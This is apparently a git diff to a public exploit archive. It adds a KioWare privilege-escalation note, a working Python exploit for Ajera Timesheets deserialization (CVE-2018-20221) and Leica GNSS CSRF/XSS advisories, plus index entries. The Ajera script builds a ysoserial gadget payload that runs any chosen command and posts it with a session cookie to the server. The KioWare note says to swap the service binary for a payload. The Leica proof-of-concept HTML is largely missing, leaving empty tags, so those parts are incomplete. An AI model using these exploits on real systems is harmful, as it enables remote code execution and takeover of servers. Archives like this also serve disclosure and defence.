BUILTIN\Administrators:(I)(F) + BUILTIN\Users:(I)(RX) + WIN-ONKVVSNUHKV\test:(I)(F) + +Successfully processed 1 files; Failed processing 0 files + +C:\> + +Exploit: +======== +Simply replace "KWSS.exe" with your preferred payload and wait for execution upon reboot. + +# Disclosure Timeline: +# ==================== +# 10-13-18: Contacted vendor +# 10-15-18: Vendor requested full report and POC +# 10-15-18: Full report and POC sent +# 10-16-18: Vendor was able to reproduce/validate the issue and filed a feature request +# 10-16-18: Asked vendor to provide timeline for patch +# 10-16-18: Requested CVE ID +# 10-17-18: CVE-2018-18435 assigned +# 10-17-18: Vendor requested 90 days timeline to patch/QA test +# 12-20-18: Vendor sent patch and requested feedback +# 12-22-18: Suggestions/modifications sent to Vendor +# 12-24-18: Vendor sent new patch and requested feedback +# 12-25-18: New Suggestions/modifications sent to Vendor +# 12-26-18: Vendor sent new patch and requested feedback +# 12-27-18: Vendor was notified that the latest patch is sufficient +# 12-31-18: Vendor released new version (v4.9.9) and patch as well +# 01-07-19: Vulnerability has been made public \ No newline at end of file diff --git a/exploits/windows/webapps/46086.txt b/exploits/windows/webapps/46086.txt new file mode 100644 index 000000000..363f07f85 --- /dev/null +++ b/exploits/windows/webapps/46086.txt @@ -0,0 +1,60 @@ +# Exploit Title: Ajera Timesheets <= 9.10.16 - Deserialization of untrusted data +# Date: 2019-01-03 +# Exploit Author: Anthony Cole +# Vendor Homepage: https://www.deltek.com/en/products/project-erp/ajera +# Version: <= 9.10.16 +# Contact: http://twitter.com/acole76 +# Website: http://twitter.com/acole76 +# Tested on: Windows 2012 +# CVE: CVE-2018-20221 +# Category: webapps +# +# Ajera is a software written in .NET by Deltek. Version <= 9.10.16 allows an attacker to cause the software to deserialize untrusted data that can result in remote code execution. +# Secure/SAService.rem in Deltek Ajera Timesheets <= 9.10.16 are vulnerable to remote code execution via deserialization of untrusted user input from an authenticated user. The executed code will run as the IIS Application Pool that is running the application. +# + +import struct, sys, requests, zlib, argparse, urlparse, subprocess + +def run_command(command): + p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) + output = b'' + for line in iter(p.stdout.readline, b''): + output += line + + return output + +def isurl(urlstr): + try: + urlparse.urlparse(urlstr) + return urlstr + except: + raise argparse.ArgumentTypeError("invalid url") + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description='Ajera .NET Remoting Exlpoit') + parser.add_argument("--url", "-u", type=isurl, required=True, help="the url of the target.") + parser.add_argument("--cmd", "-c", required=True, help="the command to execute") + parser.add_argument("--auth", "-a", required=True, help="the ASPXAUTH cookie") + parser.add_argument("--version", "-v", required=False, help="the version of Ajera Server. 8.9.9.0 => 8990", default="8990") + parser.add_argument("--ysoserial", "-y", required=True, help="the path to ysoserial.exe") + parser.add_argument("--proxy", "-p", type=isurl, required=False, help="ex: http://127.0.0.1:8080") + args = parser.parse_args() + + url_parts = urlparse.urlparse(args.url) + target_url = "%s://%s" % (url_parts.scheme, url_parts.netloc) + + proxies = {} + if(args.proxy != None): + proxy_parts = urlparse.urlparse(args.proxy) + proxies[proxy_parts.scheme] = "%s://%s" % (proxy_parts.scheme, proxy_parts.netloc) + + cmd = "/c " + args.cmd + size = len(cmd) + + serial_payload = run_command('%s -o raw -g TypeConfuseDelegate -f BinaryFormatter -c "%s"' % (args.ysoserial, args.cmd)) + + url = target_url + "/ajera/Secure/SAService.rem" + headers = {'Content-Type': 'application/octet-stream'} + cookies = {'.ASPXAUTH': args.auth} + payload = "\x04" + args.version + zlib.compress(serial_payload) + response = requests.post(url, headers=headers, cookies=cookies, data=payload, proxies=proxies, verify=False) \ No newline at end of file diff --git a/exploits/windows/webapps/46090.html b/exploits/windows/webapps/46090.html new file mode 100644 index 000000000..8bf741e41 --- /dev/null +++ b/exploits/windows/webapps/46090.html @@ -0,0 +1,58 @@ +<-- + +Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 Cross-Site Request Forgery + + +Vendor: Leica Geosystems AG +Product web page: https://www.leica-geosystems.com +Affected version: 4.30.063 + 4.20.232 + 4.11.606 + 3.22.1818 + 3.10.1633 + 2.62.782 + 1.00.395 + +Summary: The Leica GR10 is the next generation GNSS reference station receiver +that combines the latest state-of-the-art technologies with a streamlined +'plug and play' workflow. Designed for a wide variety of GNSS reference station +applications, the Leica GR10 offers new levels of simplicity, reliability and +performance. + +Desc: The application interface allows users to perform certain actions via +HTTP requests without performing any validity checks to verify the requests. +This can be exploited to perform certain actions with administrative privileges +if a logged-in user visits a malicious web site. + +Tested on: BarracudaServer.com (WindowsCE) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2019-5502 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5502.php + + +18.12.2018 + +--> + + + + +
+ + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/windows/webapps/46091.html b/exploits/windows/webapps/46091.html new file mode 100644 index 000000000..3a48ee3df --- /dev/null +++ b/exploits/windows/webapps/46091.html @@ -0,0 +1,83 @@ +<-- + +Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 JS/HTML Code Injection + + +Vendor: Leica Geosystems AG +Product web page: https://www.leica-geosystems.com +Affected version: 4.30.063 + 4.20.232 + 4.11.606 + 3.22.1818 + 3.10.1633 + 2.62.782 + 1.00.395 + +Summary: The Leica GR10 is the next generation GNSS reference station receiver +that combines the latest state-of-the-art technologies with a streamlined +'plug and play' workflow. Designed for a wide variety of GNSS reference station +applications, the Leica GR10 offers new levels of simplicity, reliability and +performance. + +Desc: The application suffers from a stored XSS vulnerability. The issue is +triggered via unrestricted file upload while restoring a config file allowing +the attacker to upload an html or javascript file that will be stored in +/settings/poc.html. This can be exploited to execute arbitrary HTML or JS +code in a user's browser session in context of an affected site. + +Tested on: BarracudaServer.com (WindowsCE) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2019-5503 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5503.php + +Ref: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5502.php + + +18.12.2018 + +--> + + + + + +
+ +
+ + \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index a1073f50f..3b67e9331 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6234,6 +6234,10 @@ id,file,description,date,author,type,platform,port 46064,exploits/windows_x86-64/dos/46064.py,"NBMonitor Network Bandwidth Monitor 1.6.5.0 - 'Name' Denial of Service (PoC)",2019-01-02,"Luis Martínez",dos,windows_x86-64, 46071,exploits/multiple/dos/46071.html,"WebKit JSC - 'AbstractValue::set' Use-After-Free",2019-01-02,"Google Security Research",dos,multiple, 46072,exploits/multiple/dos/46072.js,"WebKit JSC - 'JSArray::shiftCountWithArrayStorage' Out-of-Bounds Read/Write",2019-01-02,"Google Security Research",dos,multiple, +46078,exploits/windows/dos/46078.html,"Microsoft Edge 44.17763.1.0 - NULL Pointer Dereference",2019-01-07,"Bogdan Kurinnoy",dos,windows, +46087,exploits/windows/dos/46087.py,"BlueAuditor 1.7.2.0 - 'Key' Denial of Service (PoC)",2019-01-07,"Luis Martínez",dos,windows, +46088,exploits/windows/dos/46088.py,"SpotFTP Password Recover 2.4.2 - 'Name' Denial of Service (PoC)",2019-01-07,"Luis Martínez",dos,windows, +46089,exploits/windows/dos/46089.py,"Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)",2019-01-07,"Luis Martínez",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10184,6 +10188,7 @@ id,file,description,date,author,type,platform,port 46056,exploits/windows_x86/local/46056.py,"MAGIX Music Editor 3.1 - Buffer Overflow (SEH)",2018-12-27,bzyo,local,windows_x86, 46058,exploits/windows_x86/local/46058.py,"Terminal Services Manager 3.1 - Local Buffer Overflow (SEH)",2018-12-27,bzyo,local,windows_x86, 46059,exploits/windows_x86/local/46059.py,"Iperius Backup 5.8.1 - Buffer Overflow (SEH)",2018-12-27,bzyo,local,windows_x86, +46093,exploits/windows/local/46093.txt,"KioWare Server Version 4.9.6 - Weak Folder Permissions Privilege Escalation",2019-01-07,"Hashim Jawad",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -17051,6 +17056,7 @@ id,file,description,date,author,type,platform,port 46053,exploits/multiple/remote/46053.py,"Kubernetes - (Authenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple, 46073,exploits/linux/remote/46073.rb,"Hashicorp Consul - Remote Command Execution via Rexec (Metasploit)",2019-01-02,Metasploit,remote,linux, 46074,exploits/linux/remote/46074.rb,"Hashicorp Consul - Remote Command Execution via Services API (Metasploit)",2019-01-02,Metasploit,remote,linux, +46075,exploits/python/remote/46075.rb,"Mailcleaner - Authenticated Remote Code Execution (Metasploit)",2019-01-07,"Mehmet Ince",remote,python,443 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -40558,3 +40564,16 @@ id,file,description,date,author,type,platform,port 46060,exploits/php/webapps/46060.txt,"bludit Pages Editor 3.0.0 - Arbitrary File Upload",2018-12-27,BouSalman,webapps,php,80 46061,exploits/php/webapps/46061.txt,"WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload",2018-12-27,Kaimi,webapps,php,80 46065,exploits/php/webapps/46065.py,"Vtiger CRM 7.1.0 - Remote Code Execution",2019-01-02,AkkuS,webapps,php, +46076,exploits/php/webapps/46076.txt,"Embed Video Scripts - Persistent Cross-Site Scripting",2019-01-07,"Deyaa Muhammad",webapps,php,80 +46077,exploits/php/webapps/46077.txt,"All in One Video Downloader 1.2 - Authenticated SQL Injection",2019-01-07,"Deyaa Muhammad",webapps,php,80 +46079,exploits/php/webapps/46079.txt,"LayerBB 1.1.1 - Persistent Cross-Site Scripting",2019-01-07,0xB9,webapps,php,80 +46080,exploits/php/webapps/46080.txt,"MyBB OUGC Awards Plugin 1.8.3 - Persistent Cross-Site Scripting",2019-01-07,0xB9,webapps,php,80 +46081,exploits/cgi/webapps/46081.txt,"PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Scripting",2019-01-07,"Kumar Saurav",webapps,cgi,80 +46082,exploits/php/webapps/46082.txt,"phpMoAdmin MongoDB GUI 1.1.5 - Cross-Site Request Forgery / Cross-Site Scripting",2019-01-07,"Ozer Goker",webapps,php,80 +46083,exploits/php/webapps/46083.txt,"Wordpress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation",2019-01-07,"Noman Riffat",webapps,php,80 +46084,exploits/php/webapps/46084.txt,"MyT Project Management 1.5.1 - 'Charge[group_total]' SQL Injection",2019-01-07,"Mehmet Onder",webapps,php,80 +46085,exploits/php/webapps/46085.txt,"Roxy Fileman 1.4.5 - Unrestricted File Upload / Directory Traversal",2019-01-07,"Pongtorn Angsuchotmetee_ Vittawat Masaree",webapps,php,80 +46086,exploits/windows/webapps/46086.txt,"Ajera Timesheets 9.10.16 - Deserialization of Untrusted Data",2019-01-07,"Anthony Cole",webapps,windows, +46090,exploits/windows/webapps/46090.html,"Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - Cross-Site Request Forgery",2019-01-07,LiquidWorm,webapps,windows,80 +46091,exploits/windows/webapps/46091.html,"Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection",2019-01-07,LiquidWorm,webapps,windows, +46092,exploits/hardware/webapps/46092.py,"Huawei E5330 21.210.09.00.158 - Cross-Site Request Forgery (Send SMS)",2019-01-07,"Nathu Nandwani",webapps,hardware,